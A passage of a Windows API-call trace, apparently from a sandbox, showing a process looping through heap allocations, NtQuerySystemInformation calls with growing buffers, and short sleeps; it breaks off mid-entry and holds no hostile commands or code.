[0216.530] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0216.530] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.531] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0216.531] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0216.532] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.532] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0216.532] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.532] Sleep (dwMilliseconds=0x110) [0216.576] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0216.576] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0216.577] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.586] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0216.586] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0216.587] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.587] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0216.587] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0216.592] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.592] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0216.592] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0216.593] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.593] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0216.593] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.593] Sleep (dwMilliseconds=0x110) [0216.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0216.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0216.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0216.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0216.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0216.628] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0216.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.629] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0216.629] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0216.630] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.630] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0216.630] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.630] Sleep (dwMilliseconds=0x110) [0216.669] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0216.669] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0216.670] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0216.670] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0216.670] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0216.670] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0216.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.671] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0216.683] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0216.684] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.686] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0216.687] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.687] Sleep (dwMilliseconds=0x110) [0216.832] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0216.832] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0216.833] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.833] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0216.833] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0216.834] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.834] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0216.834] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0216.834] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.835] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0216.835] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0216.835] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.839] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0216.840] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.840] Sleep (dwMilliseconds=0x110) [0216.883] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0216.883] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0216.884] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.884] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0216.884] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0216.885] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.885] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0216.885] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0216.885] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.885] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0216.886] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0216.886] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.886] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0216.887] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.889] Sleep (dwMilliseconds=0x110) [0216.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0216.909] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0216.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0216.910] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0216.911] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.911] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0216.911] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0216.911] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.912] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0216.912] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0216.912] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.912] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0216.913] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.913] Sleep (dwMilliseconds=0x110) [0216.923] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0216.923] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0216.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0216.924] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0216.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0216.925] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0216.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0216.926] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0216.926] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.926] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0216.927] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.927] Sleep (dwMilliseconds=0x110) [0217.011] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0217.011] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.011] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.014] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0217.015] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.015] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.015] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0217.015] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.016] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.016] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0217.016] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0217.017] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0217.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.018] Sleep (dwMilliseconds=0x110) [0217.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0217.032] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.032] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0217.032] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0217.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0217.035] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0217.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.036] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0217.036] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.036] Sleep (dwMilliseconds=0x110) [0217.079] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0217.079] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0217.080] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0217.080] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.081] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.081] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0217.082] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0217.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.082] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0217.083] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.083] Sleep (dwMilliseconds=0x110) [0217.121] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0217.121] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.205] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0217.205] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.205] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.209] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0217.209] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.210] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.210] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0217.210] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0217.211] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.211] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0217.212] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.212] Sleep (dwMilliseconds=0x110) [0217.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0217.252] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.253] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0217.253] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.254] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0217.254] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.254] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.255] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0217.255] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0217.255] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.256] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0217.256] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.256] Sleep (dwMilliseconds=0x110) [0217.279] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0217.279] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.280] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.280] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0217.280] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.281] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.284] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0217.284] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.285] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.286] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0217.286] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0217.287] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.287] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0217.288] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.288] Sleep (dwMilliseconds=0x110) [0217.440] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0217.440] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.441] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.441] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0217.441] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, 